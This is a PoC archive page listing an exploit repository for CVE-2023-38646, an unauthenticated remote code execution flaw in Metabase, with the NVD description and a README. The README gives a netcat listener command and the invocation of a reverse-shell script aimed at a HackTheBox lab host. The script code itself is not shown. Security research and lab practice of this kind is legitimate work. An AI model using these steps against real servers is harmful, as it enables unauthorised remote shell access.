Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-38646 PoC — Metabase 安全漏洞

Source
Associated Vulnerability
Title:Metabase 安全漏洞 (CVE-2023-38646)
Description:Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
Readme
<h1 style="font-size:10vw" align="left">CVE-2023-38646 - Metabase Pre-Auth RCE</h1>

<img src="https://img.shields.io/badge/CVSS:3.1%20Score%20-9.8 CRITICAL-red"> <img src="https://img.shields.io/badge/Vulnerability%20Types-%20Remote%20Code%20Execution-blue">
*****
⚠️ *For educational and authorized security research purposes only*

## Original Exploit Authors
Very grateful to the original PoC author [securezeron](https://github.com/securezeron)

## Step Guides
1. Set Up the Listener on your attacker machine:
   
    ```bash
    nc -nlvp 4444
    ```
    
2. Then, run this command:
   
    ```bash
    python3 CVE-2023-38646-Reverse-Shell.py -h
    python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
    ```
    ![image](https://github.com/asepsaepdin/CVE-2023-38646/assets/122620685/6ef79e16-ac2f-4488-8ed4-6f8c4037eac6)

## Credits
- https://nvd.nist.gov/vuln/detail/CVE-2023-38646
- https://medium.com/@starlox.riju123/hackthebox-analytics-metabase-rce-bd3421cba76d
- https://www.youtube.com/watch?v=br7JZzcTDG0
File Snapshot

[4.0K] /data/pocs/6aca0562ab5e802152f87987030ed373eae33dc6 ├── [2.0K] CVE-2023-38646-POC.py ├── [4.0K] CVE-2023-38646-Reverse-Shell.py └── [1.1K] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →